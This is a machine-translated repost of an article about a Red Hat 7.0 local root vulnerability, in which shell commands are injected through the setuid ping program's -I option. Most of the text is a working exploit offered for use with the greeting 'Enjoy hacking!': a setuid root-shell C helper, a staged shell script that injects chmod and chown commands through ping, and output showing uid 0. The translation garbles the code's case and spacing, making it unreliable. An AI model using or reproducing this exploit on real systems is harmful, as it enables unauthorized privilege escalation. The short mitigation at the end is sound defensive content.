Redhat7 detailed analysis of the local ping root vulnerability
Source: Internet
Author: User
Article title: redhat7 detailed analysis of the local use of ping to get the root vulnerability. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
Author: Daying
First, I declare that I and my company are not responsible for the losses caused by using this vulnerability. The attack code is not long. you can use shell or
It is recommended to use shell to write perl.
Principle:
It may be a major vulnerability in redhat7. His ping program's-I parameter specifies the interface through modprobe and insmod to execute arbitrary generation
As you all know, the permission of the ping program is as follows:
[Hello! Sune4gle] $ ls-l/bin/ping
-Rwsr-xr-x 1 root 20604 Aug 8 2000/bin/ping
The ping program calls all the setuid bits of raw_socket.
Of course, the parameter in front of the ip address is the key, that is, the command we run. The s permission allows us to run the euid during ping with the uid with the normal permission.
It is 0, so in fact, when we run ping, we execute commands with super-support permissions. In this way, if we run the following
Command:
[Hello! Sune4gle] $ ping-I '; chmod o + w. '195.117.3.59 &>/dev/null
The current directory can be written to other users.
You can write a c program to compile and run the program:
Cat>/x. c <_ eof _
Main (){
Setuid (0); seteuid (0 );
System ("chmod 755/; rm-f/x. c ");
Execl ("/bin/bash", "bash", "-I", 0 );
}
_ Eof _
Gcc/x. c-o/x
Chmod 755/x
Should everyone understand it here? Create the x. c file in/and compile it so that it also has the s privilege.
Setuid rootshell. The following is the written attack code:
#! /Bin/sh
Echo
Echo "RedHat 7.0 exploit"
Echo "(c) 2000 suneagle"
Echo
Echo "Enjoy hacking! :)"
Echo
PING =/bin/ping
Test-u $ PING | PING =/bin/ping
If [! -U $ PING]; then
Echo "Sorry, no setuid ping ."
Exit 0
Fi
Echo "Phase 1: making/world-writable ..."
$ PING-I '; chmod o + w.' 195.117.3.59 &>/dev/null
Sleep 1
Echo "Phase 2: compiling helper program in /..."
Cat>/x. c <_ eof _
Main (){
Setuid (0); seteuid (0 );
System ("chmod 755/; rm-f/x. c ");
Execl ("/bin/bash", "bash", "-I", 0 );
}
_ Eof _
Gcc/x. c-o/x
Chmod 755/x
Echo "Phase 3: chown + chmod on our helper program ..."
$ PING-I '; chown 0x'202.102.3.1 &>/dev/null
Sleep 1
$ PING-I '; chmod + s x '202.101.23.1 &>/dev/null
Sleep 1
If [! -U/x]; then
Echo "Apparently, this is not exploitable on this system :("
Exit 1
Fi
Echo "Ye! Entering rootshell ..."
/X
Echo "Thank you ."
Haha, okay. I will paste the test result of this shell program running in redhat7:
First, I have to have a normal account.
[Hello! Sune4gle] $./getroot. sh
RedHat 7.0 exploit
(B) 2000 suneagle
Enjoy hacking!
Phase 1: making/world-writable...
Phase 2: compiling helper program in /...
Phase 3: chown + chmod on our helper program...
Ye! Entering rootshell...
[Hello! Root] # id
Uid = 0 (root) gid = 500 (sune4gle) groups = 500 (sune4gle)
[Hello! Root] #
Log after attack:
Feb 24 11:16:27 sune4gle modprobe: insmod; chmod o + w. failed
Feb 24 11:16:30 sune4gle modprobe: insmod; chown 0 x failed
Feb 24 11:16:31 sune4gle modprobe: insmod; chmod + s x failed
Solution:
Remove or restrict the setuid bit of the ping program
[Hello! Sune4gle] # chmod 655/bin/ping
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
